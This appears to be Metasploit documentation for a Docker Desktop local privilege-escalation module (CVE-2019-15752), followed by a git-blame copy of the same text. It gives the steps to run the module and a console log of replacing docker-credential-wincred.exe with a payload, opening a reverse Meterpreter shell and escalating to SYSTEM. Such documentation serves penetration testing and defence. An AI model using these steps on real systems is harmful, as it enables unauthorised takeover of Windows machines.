documentation/modules/exploit/windows/local/docker_credential_wincred.md

## Vulnerable Application

  Docker Desktop Community Edition before 2.1.0.1
  https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe

## Verification Steps

  1. Install Docker Desktop Community Edition before 2.1.0.1
  2. Start msfconsole
  3. Get a session with basic privileges
  4. Do: ```use exploit/windows/local/docker_credential_wincred```
  5. Do: ```set SESSION <sess_no>```
  6. Do: ```run```
  7. Using an administrator cmd shell on the target, run ```docker login```
  8. You should get a shell you can elevate with ```getsystem```.

## Scenarios

### Tested on Docker Community Edition 2.0.0.0 running on Windows 10x64 Release 1803

  ```
msf5 exploit(windows/local/docker_credential_wincred) > show options

Module options (exploit/windows/local/docker_credential_wincred):

   Name         Current Setting                            Required  Description
   ----         ---------------                            --------  -----------
   PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
   SESSION                                                 yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/docker_credential_wincred) > set session 1
session => 1
msf5 exploit(windows/local/docker_credential_wincred) > check

[*] Docker version 18.09.0, build 4d60db4
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/docker_credential_wincred) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Docker version 18.09.0, build 4d60db4
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Making Payload
[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Payload Upload Complete
[*] Waiting for user to attempt to login
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
First swipe at CVE-2019-15752 2020-04-15 16:52:45 -05:00			`## Vulnerable Application`

			`Docker Desktop Community Edition before 2.1.0.1`
			`https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe`

			`## Verification Steps`

Word 2020-04-15 17:01:32 -05:00			`1. Install Docker Desktop Community Edition before 2.1.0.1`
First swipe at CVE-2019-15752 2020-04-15 16:52:45 -05:00			`2. Start msfconsole`
			`3. Get a session with basic privileges`
			4. Do: ```use exploit/windows/local/docker_credential_wincred```
			5. Do: ```set SESSION <sess_no>```
			6. Do: ```run```
bcoles suggestions 2020-04-22 18:08:58 -05:00			7. Using an administrator cmd shell on the target, run ```docker login```
Forgot a step 2020-04-15 16:56:03 -05:00			8. You should get a shell you can elevate with ```getsystem```.
First swipe at CVE-2019-15752 2020-04-15 16:52:45 -05:00
			`## Scenarios`

			`### Tested on Docker Community Edition 2.0.0.0 running on Windows 10x64 Release 1803`

			```
			`msf5 exploit(windows/local/docker_credential_wincred) > show options`

			`Module options (exploit/windows/local/docker_credential_wincred):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`PROGRAMDATA C:\ProgramData\DockerDesktop\version-bin\ no Path to docker version-bin.`
			`SESSION yes The session to run this module on.`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Automatic`


			`msf5 exploit(windows/local/docker_credential_wincred) > set session 1`
			`session => 1`
			`msf5 exploit(windows/local/docker_credential_wincred) > check`

			`[*] Docker version 18.09.0, build 4d60db4`
			`[*] The target appears to be vulnerable.`
			`msf5 exploit(windows/local/docker_credential_wincred) > run`

			`[*] Started reverse TCP handler on 192.168.135.168:4444`
			`[*] Docker version 18.09.0, build 4d60db4`
			`[*] UAC is Enabled, checking level...`
			`[*] Checking admin status...`
			`[+] Part of Administrators group! Continuing...`
			`[+] UAC is set to Default`
			`[+] BypassUAC can bypass this setting, continuing...`
			`[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe`
			`[*] Making Payload`
			`[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe`
			`[*] Payload Upload Complete`
typo 2020-04-24 10:01:31 -05:00			`[*] Waiting for user to attempt to login`
First swipe at CVE-2019-15752 2020-04-15 16:52:45 -05:00			`[*] Sending stage (180291 bytes) to 192.168.132.125`
			`[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500`

			`meterpreter > sysinfo`
			`Computer : DESKTOP-D1E425Q`
			`OS : Windows 10 (10.0 Build 17134).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x86/windows`
			`meterpreter > getuid`
			`Server username: DESKTOP-D1E425Q\msfuser`
			`meterpreter > getsystem`
			`...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).`
			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			```